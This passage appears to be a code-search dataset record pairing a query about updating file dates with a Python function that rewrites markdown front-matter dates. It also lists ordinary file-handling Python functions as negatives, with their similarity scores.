set(UPDATE_FILES_STATIC)\n update_files_exclude = set(UPDATE_FILES_EXCLUDE)\n\n for root, dirs, files in os.walk(path.join(PATH_ROOT, directory)):\n for filen in files:\n if UPDATE_FILES_RE.match(filen):\n filep = path.join(root, filen)\n update_files_list.add(path.relpath(filep, PATH_ROOT))\n \n return update_files_list - update_files_exclude", "def loop_dir(dir_name: str, graph_ext: str) -> None:\n directory = fsencode(dir_name)\n for file in listdir(directory):\n filename = fsdecode(file)\n if 
filename.endswith(graph_ext):\n draw_graph(filename)", "def fix_file_dates(source_file_name, dest_file_name):\n shutil.copystat(source_file_name, dest_file_name)\n print(\"Fixed dates for \" + dest_file_name)", "def dirGenerator(datadirectory):\n\n subdirectories = [row for row in os.listdir(datadirectory) if '$' not in row]\n\n #iterate through subdirectories\n for day in subdirectories:\n\n #collect raw data set file names in sub directories\n fileNames = [row for row in os.listdir(datadirectory + day + '\\\\RawDataFiles\\\\')]\n\n #iterate over the raw datasets\n print 'There are ' + str(len(fileNames)) + ' datasets in ' + day\n for index, datafile in enumerate(fileNames):\n yield datadirectory + day + '\\\\RawDataFiles\\\\' + datafile, day, datafile, index", "def index_files(self, input_dir, output_dir):\n self.lucene = Lucene(output_dir)\n self.lucene.open_writer()\n for path, dirs, _ in os.walk(input_dir):\n for dir in sorted(dirs):\n for _, _, files in os.walk(os.path.join(input_dir, dir)):\n for fn in sorted(files):\n print \"Indexing \", os.path.join(input_dir + dir, fn), \"...\"\n self.index_file(os.path.join(input_dir + dir, fn))\n # closes Lucene index\n self.lucene.close_writer()", "def run(self):\n for filepage in self.generator:\n print (filepage)\n filepage.touch()", "def files(directory):\n p = directory.fullpath\n with os.scandir(p) as it:\n for entry in it:\n if not entry.is_dir(follow_symlinks=False):\n if entry.is_symlink():\n d = os.readlink(os.path.join(p, entry.name))\n f = File(directory_id=directory.id,\n size=0, mtime=0,\n name=entry.name,\n link=True, destination=d)\n else:\n st = entry.stat(follow_symlinks=False)\n f = File(directory_id=directory.id,\n size=st.st_size,\n mtime=int(st.st_mtime),\n name=entry.name)\n Session.add(f)\n Session.commit()", "def do_2004(in_dir, out_dir):\n dir_items = setup_outdir_and_get_input(in_dir, out_dir)\n for idx, item in enumerate(dir_items):\n full_path = in_dir + os.path.sep + item\n print(f\"{full_path} -> {out_dir}/{idx}\")\n create_dirs_and_write_files(full_path, idx, in_dir, item, out_dir)", "def scan_directory(self, dirname):\n if not dirname:\n dirname = os.getcwd()\n\n if os.path.exists(dirname):\n for item in os.listdir(dirname):\n item_path = os.path.join(dirname, item)\n if os.path.isfile(item_path):\n self.file_confidence.append(self.confidence(item_path))\n else:\n raise FileNotFoundError('Directory does not exist. 
Change your path and try again')", "def _get_dir_mtime(self, sentry_unit, directory):\n return sentry_unit.directory_stat(directory)['mtime']", "def updateDiskFileList(self):\n\n if self.m_curPath:\n # Get me just the files please.\n for _, _, files in os.walk(self.m_curPath):\n break\n else:\n files = []\n\n files.sort()\n if files != self.m_diskNames:\n self.m_diskNames[:] = files\n self.m_newNames[:] = []\n\n self.populateFileList()", "def update_proj_dir():\n cwd = os.getcwd()\n srcf_dir = cwd\n i = 0 # Flag\n flg_cpy = True # Flag to cpy func\n flg_rm = True # Flag to rm func\n file_uc_list = [] # Files unchanged\n file_c_list = [] # Files changed\n file_r_list = [] # Files to be removed\n # Project dir\n dstf_dir = r\"C:\\Users\\ajiteshr7\\Dropbox\\python_proj\"\n file_srclist = os.listdir(srcf_dir)\n file_dstlist = os.listdir(dstf_dir)\n file_uc_list, file_c_list = chk_chng(file_srclist, file_dstlist)\n # Display files unchanged\n if file_uc_list:\n print marker\n print \"File List\"\n print \"No of files : %d\" %(len(file_uc_list))\n print_file(file_uc_list)\n # Display files changed\n if file_c_list:\n print \"Files added\"\n print \"No of files added: %d\" %(len(file_c_list))\n print_file(file_c_list)\n else:\n print \"No files added\"\n print \"No of files added: 0\"\n flg_cpy = False\n # Copy files..\n i = cpy_c_files(file_c_list, srcf_dir, dstf_dir,flg_cpy)\n # Remove files...\n file_list, file_r_list = chk_chng(file_dstlist,file_srclist)\n if not file_r_list:\n flg_rm = False\n rm_f(file_r_list,dstf_dir,flg_rm)\n # Display result updated or didn't....\n if flg_cpy == False and flg_rm == False:\n print \"Directory is up-to-date...\"\n elif i == len(file_c_list):\n print \"Sucessfully Updated the project directory :)\"\n else:\n print \"Didn't updated the folder.... 
=(\"\n return False\n return True", "def scan_dir(self, directory=\".\"):\n for root, dirs, files in os.walk(directory, topdown=False):\n for name in files:\n for filetype in self.allowed_file_types:\n if name.split(\".\")[-1] == filetype:\n self.song_list.append(os.path.join(root, name))", "def searchDirectory(_dirname):\n for (path, dirnames, filenames) in os.walk(_dirname):\n for filename in filenames:\n if os.path.splitext(filename)[-1] == \".h\":\n fullname = os.path.join(path, filename)\n md5 = makeMD5(fullname)\n updateMD5(fullname, md5)\n\n if os.path.isfile(fullname + \".tmp\"):\n os.remove(fullname + \".tmp\")", "def walk_dir(self, path = '/srv/www/mod_intf/interface_mod_sec/rules_dir/tmp'):\n for root, dirs, files in os.walk('/srv/www/mod_intf/interface_mod_sec/rules_dir/tmp'):\n for each_file in files:\n print root+\"/\"+ each_file\n self.move_files_to_db(path_file =root+\"/\"+each_file, file_name=each_file)\n return True", "def _get_fsevent_files(self):\r\n # Print the header columns to the output files\r\n Output.print_columns(self.l_all_fsevents)\r\n\r\n # Total number of files in events dir #\r\n t_files = len(os.listdir(self.path))\r\n for filename in os.listdir(self.path):\r\n if filename == 'fseventsd-uuid':\r\n t_files -= 1\r\n self.time_range_src_mod = []\r\n prev_mod_date = \"Unknown\"\r\n prev_last_wd = 0\r\n c_last_wd = 0\r\n\r\n # Uses file mod dates to generate time ranges by default unless\r\n # files are carved or mod dates lost due to exporting\r\n self.use_file_mod_dates = True\r\n\r\n # Run simple test to see if file mod dates\r\n # should be used to generate time ranges\r\n # In some instances fsevent files may not have\r\n # their original mod times preserved on export\r\n # This code will flag true when the same date and hour\r\n # exists for the first file and the last file\r\n # in the provided source fsevents folder\r\n first = os.path.join(self.path, os.listdir(self.path)[0])\r\n last = os.path.join(self.path, os.listdir(self.path)[len(os.listdir(self.path)) - 1])\r\n first = os.path.getmtime(first)\r\n last = os.path.getmtime(last)\r\n first = str(datetime.datetime.utcfromtimestamp(first))[:14]\r\n last = str(datetime.datetime.utcfromtimestamp(last))[:14]\r\n\r\n if first == last:\r\n self.use_file_mod_dates = False\r\n\r\n # Iterate through each file in supplied fsevents dir\r\n for filename in os.listdir(self.path):\r\n if filename == 'fseventsd-uuid':\r\n continue\r\n # Variables\r\n self.all_files_count += 1\r\n\r\n # Call the progress bar which shows parsing stats\r\n progress(self.all_files_count, t_files)\r\n\r\n buf = \"\"\r\n\r\n # Full path to source fsevent file\r\n self.src_fullpath = os.path.join(self.path, filename)\r\n # Name of source fsevent file\r\n self.src_filename = filename\r\n # UTC mod date of source fsevent file\r\n self.m_time = os.path.getmtime(self.src_fullpath)\r\n self.m_time = str(datetime.datetime.utcfromtimestamp((self.m_time))) + \" [UTC]\"\r\n\r\n # Regex to match against source fsevent log filename\r\n regexp = re.compile(r'^.*[\\][0-9a-fA-F]{16}$')\r\n\r\n # Test to see if fsevent file name matches naming standard\r\n # if not, assume this is a carved gzip\r\n if len(self.src_filename) == 16 and regexp.search(filename) is not None:\r\n c_last_wd = int(self.src_filename, 16)\r\n self.time_range_src_mod = prev_last_wd, c_last_wd, prev_mod_date, self.m_time\r\n self.is_carved_gzip = False\r\n else:\r\n self.is_carved_gzip = True\r\n\r\n # Attempt to decompress the fsevent archive\r\n try:\r\n with 
self.skip_gzip_check():\r\n self.files = gzip.GzipFile(self.src_fullpath, \"rb\")\r\n buf = self.files.read()\r\n\r\n except Exception as exp:\r\n # When permission denied is encountered\r\n if \"Permission denied\" in str(exp) and not os.path.isdir(self.src_fullpath):\r\n print('\\nEnsure that you have permissions to read '\r\n 'from {}\\n{}\\n'.format(self.path, str(exp)))\r\n sys.exit(0)\r\n # Otherwise write error to log file\r\n else:\r\n self.logfile.write(\r\n \"%s\\tError: Error while decompressing FSEvents file.%s\\n\" % (\r\n self.src_filename,\r\n str(exp)\r\n )\r\n )\r\n self.error_file_count += 1\r\n continue\r\n\r\n # If decompress is success, check for DLS headers in the current file\r\n dls_chk = FSEventHandler.dls_header_search(self, buf, self.src_fullpath)\r\n\r\n # If check for DLS returns false, write information to logfile\r\n if dls_chk is False:\r\n self.logfile.write('%s\\tInfo: DLS Header Check Failed. Unable to find a '\r\n 'DLS header. Unable to parse File.\\n' % (self.src_filename))\r\n # Continue to the next file in the fsevents directory\r\n self.error_file_count += 1\r\n continue\r\n\r\n self.parsed_file_count += 1\r\n\r\n # Accounts for fsevent files that get flushed to disk\r\n # at the same time. Usually the result of a shutdown\r\n # or unmount\r\n if not self.is_carved_gzip and self.use_file_mod_dates:\r\n prev_mod_date = self.m_time\r\n prev_last_wd = int(self.src_filename, 16)\r\n\r\n # If DLSs were found, pass the decompressed file to be parsed\r\n FSEventHandler.parse(self, buf)", "def load(self, dirname, pattern):\n\n cachefile = os.path.join(dirname, YACODIR_CACHEFILE)\n\n # TODO: get caching to work properly :(\n # if os.path.exists(cachefile):\n # if os.path.getmtime(dirname) == \\\n # os.path.getmtime(cachefile):\n # load cache\n # super(YacoDir, self).load(cachefile)\n # return\n\n for root, dirs, files in os.walk(dirname):\n #print('-' * 80)\n ##import sh\n #print(sh.ls(\"-l\", dirname))\n #print(root, dirs, files, pattern)\n to_parse = sorted(fnmatch.filter(files, pattern))\n base = root.replace(dirname, '').strip('/')\n base = base.replace('/', '.')\n #lg.critical(\"{0} {1}\".format(root, dirs))\n for filename in to_parse:\n fullname = os.path.join(root, filename)\n lg.debug(\"YacoDir loading {0}\".format(fullname))\n #print (\"loadlaod\", filename, fullname)\n nleaf = _get_leaf(base, filename, pattern)\n\n with open(fullname) as F:\n y = yaml.load(F.read())\n\n if nleaf == '':\n self.update(y)\n else:\n self[nleaf].update(y)\n #print('*' * 80)\n # print self.pretty()\n if self:\n # after loading - save to cache!\n super(YacoDir, self).save(cachefile)", "def rename_all(dirpath, startletter, startindex, verbose=1):\n\n if (verbose == 0):\n logging.getLogger().setLevel(logging.ERROR)\n elif (verbose == 1):\n logging.getLogger().setLevel(logging.WARNING)\n elif (verbose == 2):\n logging.getLogger().setLevel(logging.INFO)\n else:\n logging.getLogger().setLevel(logging.DEBUG)\n\n indexstr = startindex\n datetimestr_to_fullfname_dict = {}\n\n # iterate over all files in subdirectories from given root directory\n for rootdir, alldirs, allfiles in os.walk(dirpath):\n\n for afile in allfiles:\n\n # create the full path to the file\n fullfname = os.path.join(rootdir, afile)\n\n # check if there is a valid file\n if not (os.path.exists(fullfname) and\n os.path.isfile(fullfname)):\n logging.warning(\"Cannot access %r, skipping it\", fullfname)\n continue\n\n # First try if the file is an image file with EXIF tags\n # if so, return valid datetimestr, 
otherwise try date metadata\n datetimestr = extract_exif(fullfname)\n if not (datetimestr):\n datetimestr = extract_date_metadata(fullfname)\n\n # if valid datetimestr \n if (datetimestr):\n # this will handle the case when there is already the exact\n # same datetimestr in the dictionary(shouldn't happen often)\n while (datetimestr in datetimestr_to_fullfname_dict):\n datetimestr = datetimestr + '*'\n datetimestr_to_fullfname_dict[datetimestr] = fullfname\n logging.info(\n \"Entering datetimestr %r to dictionary\", datetimestr)\n else:\n logging.warning(\n \"No EXIF or date metadata found in %r, skipping it\",\n fullfname)\n\n # Go through the alphabetically (and therefore time-stamp sorted)\n # list of keys of the dictionary to do the rename\n for a_dtstr in sorted(datetimestr_to_fullfname_dict.keys()):\n\n # we discard the time portion as we don't need it for\n # the filename\n datestr = a_dtstr[:8]\n\n # the file extension from original filename\n afileext = get_fname_ext(\n datetimestr_to_fullfname_dict[a_dtstr]).upper()\n\n newfname = datestr + \"_\" + startletter + \"_\" + indexstr + afileext\n\n # create the new full filename by taking existing path of old \n # full filename and combining with new file name\n newfullfname = os.path.join(\n os.path.dirname(datetimestr_to_fullfname_dict[a_dtstr]),\n newfname)\n\n try:\n logging.info(\"Renaming %r -> %r\",\n datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname)\n os.rename(datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname)\n except os.error as oserr:\n logging.error(\"Can't rename file %s to %s: %s\",\n datetimestr_to_fullfname_dict[a_dtstr],\n newfullfname, oserr)\n\n\n indexstr = incr_indexstr(indexstr)", "def _iter_expiration_files(dirpath_expiration):\n if not os.path.isdir(dirpath_expiration):\n return\n regex_expiration_file = re.compile(_REGEX_EXPIRATION_FILE)\n for name in os.listdir(dirpath_expiration):\n path = os.path.join(dirpath_expiration, name)\n if not ( os.path.isfile(path)\n and re.match(regex_expiration_file, name)):\n raise RuntimeError(\n 'Unexpected file found in expiration folder: %s.', path)\n (sz_file_expiration, file_owner, _) = name.split('.')\n file_expiration = datetime.datetime.strptime(\n sz_file_expiration, _DATEFMT_EXPIRATION)\n yield (path, file_expiration, file_owner)", "def _zipdir(self, dir: Path, zip_handle: zipfile.ZipFile) -> None:\n for root, _, files in os.walk(dir):\n for file in files:\n zip_handle.write(os.path.join(root, file), file)", "def update_rundir(self):\n self.rundir = []\n run_index = len(self.rundir)\n while os.path.isdir( os.path.join(self.relaxdir, \"run.\" + str(run_index))):\n self.rundir.append( os.path.join(self.relaxdir, \"run.\" + str(run_index)) )\n run_index += 1", "def update_csv():\n return os.listdir('./data')", "def analyze_dir(self, dirname):\n if self.exceeded_max():\n return\n\n for (dirpath, dirnames, filenames) in os.walk(dir_name):\n for filename in filenames:\n self.analyze_file(dirname + \"/\" + filename)", "def walk():\n os.chdir('Lyrics')\n for directory_name, subdirectories, filenames in os.walk('.'):\n print(\"Directory:\", directory_name)\n print(\"\\tcontains subdirectories:\", subdirectories)\n print(\"\\tand files:\", filenames)\n print(\"(Current working directory is: {})\".format(os.getcwd()))\n for filename in filenames:\n shutil.move(os.path.join(directory_name, filename),\n os.path.join(directory_name) + '/' + get_fixed_filename(filename))", "def update(self, dT):\r\n\r\n current_delta_time = dT\r\n for module in self.modules:\r\n 
module(self)", "def _refresh_dag_dir(self) -> bool:\n now = timezone.utcnow()\n elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()\n if elapsed_time_since_refresh > self.dag_dir_list_interval:\n # Build up a list of Python files that could contain DAGs\n self.log.info(\"Searching for files in %s\", self._dag_directory)\n self._file_paths = list_py_file_paths(self._dag_directory)\n self.last_dag_dir_refresh_time = now\n self.log.info(\"There are %s files in %s\", len(self._file_paths), self._dag_directory)\n self.set_file_paths(self._file_paths)\n\n try:\n self.log.debug(\"Removing old import errors\")\n DagFileProcessorManager.clear_nonexistent_import_errors(file_paths=self._file_paths)\n except Exception:\n self.log.exception(\"Error removing old import errors\")\n\n def _iter_dag_filelocs(fileloc: str) -> Iterator[str]:\n \"\"\"Get \"full\" paths to DAGs if inside ZIP files.\n\n This is the format used by the remove/delete functions.\n \"\"\"\n if fileloc.endswith(\".py\") or not zipfile.is_zipfile(fileloc):\n yield fileloc\n return\n try:\n with zipfile.ZipFile(fileloc) as z:\n for info in z.infolist():\n if might_contain_dag(info.filename, True, z):\n yield os.path.join(fileloc, info.filename)\n except zipfile.BadZipFile:\n self.log.exception(\"There was an error accessing ZIP file %s %s\", fileloc)\n\n dag_filelocs = {full_loc for path in self._file_paths for full_loc in _iter_dag_filelocs(path)}\n\n from airflow.models.dagcode import DagCode\n\n SerializedDagModel.remove_deleted_dags(\n alive_dag_filelocs=dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n DagModel.deactivate_deleted_dags(\n dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n DagCode.remove_deleted_code(\n dag_filelocs,\n processor_subdir=self.get_dag_directory(),\n )\n\n return True\n return False" ]
[ "0.7497474", "0.65693516", "0.6360544", "0.6272613", "0.62687546", "0.6217366", "0.58838624", "0.58187634", "0.5807831", "0.57809776", "0.57797885", "0.57654995", "0.5759113", "0.57328516", "0.570991", "0.56900525", "0.56631005", "0.56558955", "0.5641615", "0.5629182", "0.5624835", "0.5609571", "0.55798995", "0.5569067", "0.55629313", "0.5555831", "0.55514437", "0.55399776", "0.55278116", "0.5514329", "0.5508528", "0.5508516", "0.54908544", "0.5484257", "0.5461388", "0.5459796", "0.5446649", "0.54400456", "0.54351115", "0.54151136", "0.5408854", "0.54035527", "0.5401808", "0.5399744", "0.5397668", "0.53771013", "0.53587115", "0.53533226", "0.5348619", "0.53469634", "0.533925", "0.5338088", "0.53359526", "0.53332573", "0.5326985", "0.5310846", "0.53027487", "0.529214", "0.52844626", "0.52817893", "0.5279784", "0.52753824", "0.5271847", "0.526116", "0.526065", "0.5258659", "0.52509683", "0.52485067", "0.52457654", "0.52457446", "0.52355283", "0.52323", "0.52294385", "0.5219128", "0.51992774", "0.5197912", "0.5191416", "0.51898384", "0.51883644", "0.5187193", "0.51869786", "0.518614", "0.51826197", "0.5182238", "0.51746273", "0.5173171", "0.5168616", "0.5167488", "0.5166635", "0.5163928", "0.51514167", "0.5150516", "0.5146269", "0.51378137", "0.5137087", "0.51370865", "0.5134745", "0.513472", "0.5132766", "0.5131435" ]
0.7363431
1
This function updates the date of the files passed into it.
from datetime import datetime, date

def edit_files(i_file):
    a_file = open(i_file, "r")
    content = a_file.readlines()
    a_file.close()
    content[3] = f"years: {datetime.now().year}\n"
    content[4] = f'lastupdated: "{date.today()}"\n'
    a_file = open(i_file, "w")  # open the same file and overwrite lines 3 & 4
    a_file.writelines(content)
    a_file.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_date(dest=dest):\n for root, _, files in os.walk(dest):\n ignore = [\"README.md\",\"SUMMARY.md\"]\n _ = [edit_files(root + \"/\" + file) for file in files if (file not in ignore and file.endswith(\".md\"))]", "def changeDate(names, date, ctlFunc = lambda s, d: True): \n\n # parse date\n try:\n day, month, year = re.fullmatch(\"(\\d\\d)(\\d\\d)(\\d\\d\\d\\d)\", date).groups()\n except AttributeError as e:\n raise\n \n # convert strings to ints\n day = int(day)\n month = int(month)\n year = int(year)\n \n for name in names:\n\n if ctlFunc(name, \"*DATE*\"):\n\n # get HH MM SS from file\n p_timestamp = os.path.getmtime(name)\n mdt = datetime.datetime.fromtimestamp(p_timestamp)\n \n # construct new datetime object with file time and provided date\n mdt = datetime.datetime(year, month, day, mdt.hour, mdt.minute, mdt.second)\n\n # change to new file timestamp by passing in datetime.timestamp() \n os.utime(name, (mdt.timestamp(), mdt.timestamp()))", "def _update_files():\n configuration_settings = get_configuration()\n\n # Need to find all of the files that are stored in the input_files directories in order to start building the\n # reports that will be used to generate the static log files.\n for input_path in configuration_settings.processing.inputs:\n search_path = pathlib.Path(input_path)\n\n # Currently going to make the assumption that everyone is using the path naming convention that I'm dictating\n # which is YYYY/MM/DD/file.ext\n for file_component in search_path.glob('*/*/*/*'):\n # Store all of the files into a dictionary containing the keys and a list of the files that are associated\n # with that day\n updaters.update_files(search_path, file_component)", "def fix_file_dates(source_file_name, dest_file_name):\n shutil.copystat(source_file_name, dest_file_name)\n print(\"Fixed dates for \" + dest_file_name)", "def rebase_add_date():\n\tfilenames, clippings = load_clippings(inFolder)\n\tfor file, clip in zip(filenames, clippings):\n\t\tdate = \"-\".join(file.split(\"-\")[:3])\n\t\tdate = date.split(\"/\")[-1]\n\t\tclip[\"clipDate\"] = date\n\t\twith open(file, \"w\") as outfile:\n\t\t\tjson.dump(clip, outfile)", "def get_file_date(self, file: str) -> date:", "def update(self, date):\r\n self.date = date", "def test_change_mtime(self):\n with pike.Graph('g') as graph:\n pike.glob('.', '*') | pike.ChangeListenerNode(fingerprint='mtime')\n self.make_files(foo='a', bar='b')\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo', 'bar'])\n new_mtime = time.time() + 1\n os.utime('foo', (new_mtime, new_mtime))\n ret = graph.run()\n self.assert_files_equal(ret['default'], ['foo'])", "def last_file_updated(self):\n query = '*.xml'\n keymap_files = glob.glob(query)\n\n sorted_files = sorted(keymap_files, key=self.mtime, reverse=1)\n last_modified_file = sorted_files[0]\n second_last_modified_file = sorted_files[1]\n\n t1 = self.mtime(last_modified_file)\n t2 = self.mtime(second_last_modified_file)\n\n logger.debug('Last modified time: {0}'.format(t1))\n logger.debug('Second Last modified time: {0}'.format(t2))\n\n last_modified_time = self.mtime(last_modified_file)\n last_access_time = self.atime(last_modified_file)\n\n if sys.platform == \"win32\":\n logger.info('Detected Windows environment')\n # self.regenerate_osx(last_access_time, last_modified_time)\n elif sys.platform == 'darwin':\n logger.info('Detected OSX environment')\n # self.regenerate_windows(last_access_time, last_modified_time)\n else:\n logger.error('Unhandled platform: {0}'.format(sys.platform))\n 
pass", "def mtime(path):", "def setLastModified(when):", "def file_last_updated(self, file_last_updated):\n\n self._file_last_updated = file_last_updated", "def write_new_date(self) -> None:\n\n with open(str(os.path.join(THIS_DIR, \"data_file.json\")), mode='r') as json_file:\n data = json.load(json_file)\n data[self.site] = str(self.get_last_image_date())\n json_file.close()\n with open(str(os.path.join(THIS_DIR, \"data_file.json\")), mode='w') as json_file:\n json.dump(data, json_file)\n json_file.close()", "def statusupdate(filepath):\n pass", "def update(self):\n if os.path.isdir(self.full_path):\n self.file_list = os.listdir(self.full_path)\n else:\n self.file_list = []", "def checkFiles(self): \r\n mdate_filenames_list = []\r\n mdate_filenames_tuple = {}\r\n last24 = []\r\n now = datetime.datetime.now() \r\n noise,ft = file_type.split('.')\r\n ## note can do an entry bg color stoplight thing >24 hrs = red, 12-24 hrs = yellow < 12 = green nice little if loop\r\n for f in filenames_list:\r\n if os.path.isfile(f):\r\n lastmod_date = datetime.datetime.fromtimestamp(os.path.getmtime(f))\r\n mdate_filenames_tuple = lastmod_date, f\r\n mdate_filenames_list.append(mdate_filenames_tuple)\r\n \r\n if now - lastmod_date < file_age:\r\n \r\n #print (\"{} was last modified on {:%a %b %d %Y, %H:%M:%S, %Z}. Moving to 'destinaiton' transfer folder.\".format(f, lastmod_date))\r\n last24.append(f)\r\n shutil.copy2(f, destination)\r\n xferTime=time.time()\r\n \r\n fa = str(file_age) \r\n with sqlite3.connect('fileTransfer.db') as connection:\r\n c = connection.cursor()\r\n c.execute(\"INSERT INTO tbl_lastRun(col_timestamp, col_source, col_destination, col_file_type, col_file_age) VALUES (?,?,?,?,?)\",(xferTime, source, destination, ft, hrs))\r\n connection.commit()\r\n connection.close \r\n\r\n clear(self)\r\n ask_quit(self)", "def get_file_modification_date() -> str:\n file_modification_date = datetime.now().strftime(\"%d.%m.%Y\")\n print(file_modification_date)\n return file_modification_date", "def info_date(source_files: AllSourceFilenames = AllSourceFilenames(),\n out_datefirst: OutputCommonData = OutputCommonData(\"cwb.datefirst\"),\n out_datelast: OutputCommonData = OutputCommonData(\"cwb.datelast\"),\n datefrom: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.datefrom\"),\n dateto: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.dateto\"),\n timefrom: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.timefrom\"),\n timeto: AnnotationAllSourceFiles = AnnotationAllSourceFiles(\"[dateformat.out_annotation]:dateformat.timeto\")):\n first_date = None\n last_date = None\n\n for file in source_files:\n from_dates = sorted((int(x[0]), x[1]) for x in datefrom.read_attributes(file, (datefrom, timefrom)) if x[0])\n if from_dates and (first_date is None or from_dates[0] < first_date):\n first_date = from_dates[0]\n to_dates = sorted((int(x[0]), x[1]) for x in dateto.read_attributes(file, (dateto, timeto)) if x[0])\n if to_dates and (last_date is None or to_dates[-1] > last_date):\n last_date = to_dates[-1]\n\n if not first_date or not last_date:\n raise SparvErrorMessage(\"Corpus is configured as having date information, but no dates were found.\")\n\n # Parse and re-format dates (zero-padding dates with less than 8 digits, needed by strptime)\n first_date_d = datetime.strptime(f\"{str(first_date[0]).zfill(8)} {first_date[1]}\", \"%Y%m%d %H%M%S\")\n first_date_formatted = 
first_date_d.strftime(\"%Y-%m-%d %H:%M:%S\")\n last_date_d = datetime.strptime(f\"{str(last_date[0]).zfill(8)} {last_date[1]}\", \"%Y%m%d %H%M%S\")\n last_date_formatted = last_date_d.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n out_datefirst.write(first_date_formatted)\n out_datelast.write(last_date_formatted)", "def update_metadata_csv(self, source):\n timestamp = os.path.getmtime(source)\n filedate = datetime.datetime.fromtimestamp(timestamp)\n return self.update_metadata_date(filedate)", "def update_date(self, update_date):\n\n self._update_date = update_date", "def update_date(self, update_date):\n\n self._update_date = update_date", "def updated_date(self, updated_date):\n self._updated_date = updated_date", "def modify_input_file(filepath, updated_file_list):\n lines = 0 # current input line number\n file_changed = False # the file has changed\n\n # find and change matching lines\n pattern = re.compile(\"[Cc]opyright\")\n with open(filepath, mode='r', encoding='utf-8', newline='') as file_in:\n for line in file_in:\n lines += 1\n if pattern.search(line) and __old_date in line:\n line = line.replace(__old_date, __new_date)\n file_changed = True\n updated_file_list.append(line)\n return file_changed", "def update(src):", "def timestamp_one(self, path):\n stat = path.stat()\n sde = self.manager.source_date_epoch\n if stat.st_mtime > sde:\n cls = self.__class__.__name__\n self.log.debug(\n f\"[lite][base] <{cls}> set time to source_date_epoch {sde} on {path}\"\n )\n os.utime(path, (sde, sde))\n return\n return", "def timestamp_one(self, path):\n stat = path.stat()\n sde = self.manager.source_date_epoch\n if stat.st_mtime > sde:\n cls = self.__class__.__name__\n self.log.debug(\n f\"[lite][base] <{cls}> set time to source_date_epoch {sde} on {path}\"\n )\n os.utime(path, (sde, sde))\n return\n return", "def _archiveDataByDate(self, src, dest):\n root = os.getcwd()\n srcPath = join(root,src)\n destPath = join(root,dest)\n f = [] #Array with list of files in directory\n fDate = [] #Array with list of files with certain date;\n s = [] #Array with list of files successfully copied\n for (dirpath, dirnames, filenames) in walk(srcPath):\n f.extend(filenames)\n if len(f) > 0:\n for i in f:\n match = re.search(r'\\d{4}-\\d{2}-\\d{2}', i)\n if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:\n try:\n buffer_size = int(20000)\n fileSrcPath = join(dirpath, i)\n fileDestPath = join(destPath, i)\n with open(fileSrcPath, 'rb') as fsrc:\n with open(fileDestPath, 'wb') as fdest:\n copy = shutil.copyfileobj(fsrc,fdest,buffer_size)\n copy\n self._backupLog('Copy Operation File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) +'\\n') #+ '\\t'+ 'Path: '+ str(srcPath)\n s.append(i)\n except shutil.Error as e:\n self._backupLog('Error: %s' % e + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except IOError as e:\n self._backupLog('Error: %s' % e.strerror + '\\t' + 'File: '+str(i)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n if len(s) >0:\n for (dirpath,dirnames,filenames) in walk(srcPath):\n for cfile in f:\n for sfile in s:\n if cfile == sfile:\n try:\n filetoDelete = join(srcPath, cfile)\n os.remove(filetoDelete)\n self._backupLog('Delete Operation File: '+str(cfile)+ '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')\n except OSError, e:\n self._backupLog('Error deleting file: %s - %s.' 
% (e.filename, e.strerror) + '\\t' + 'Time: '+ str(time.strftime(\"%H:%M:%S\")) + '\\n')", "def mtime(name):", "def checkDateForFileName(self):\n #self.currentLocalTime was already changed in log Temperatures\n if self.currentLocalTime.tm_mday != self.currentDay:\n #the day has changed we should start a new log file!\n self.logFile = self._logFile_default()\n self._create_log_file()", "def _update_modified_data_sources(self):\n new_last_imported = datetime.utcnow()\n self._update_modified_since(self.last_imported)\n self.last_imported = new_last_imported", "def add_timestamps(dir_video):\n print(\"Adding creation dates to file names\")\n os.chdir(dir_video)\n # get only top level dir info\n dir_data_video_files = next(os.walk(dir_video))\n list_video_files = dir_data_video_files[2] # get file list\n for f_name in list_video_files:\n if GOPRO_PATTERN.search(f_name):\n f_time = time.strftime(r\"%Y-%m-%d_%H-%M\", time.localtime(os.path.getctime(f_name)))\n os.rename(f_name, f\"{f_time}_{f_name}\")", "def updateFileInfo(self, data, pid):\n self.db.updateLinkInfo(data)\n self.evm.dispatchEvent(\"packageUpdated\", pid)", "def do_touch ( self, fspath ):\n return", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def update_rental_returned_date(self, rental_id, returned_date):\n super(RentalHistoryText, self).update_rental_returned_date(rental_id, returned_date)\n self.save_file()", "def fileparse(self, dir, givendate, i, j):\t\t# i and j are counters that will be incremented by at most 1 (each) every time fileparse is called\n if self.findcreatedate() > givendate:\t# Test file's creation date against date passed into function\n if j != 0:\t\t\t\t# If this is the first time (locally) we've found a self.filename that needs to be copied, reset j\n print \"\\n\",\n j = 0\n dest = dir + self.filename\n copy(self.filename, dest)\n print \"\\r{} being copied\".format(self.filename),\n i += 1\t\t\t\t\t# increment our count of self.filenames that have been copied in a row\n else:\n j += 1\t\t\t\t\t# otherwise, increment our count of self.filenames skipped\n print \"\\r{} files parsed after last success\".format(j),\n countarf = [i, j]\t\t\t\t\t# put i an j into an array, then return it\n return countarf", "def updated_date(self, updated_date):\n\n self._updated_date = updated_date", "def updated_date(self, updated_date):\n\n 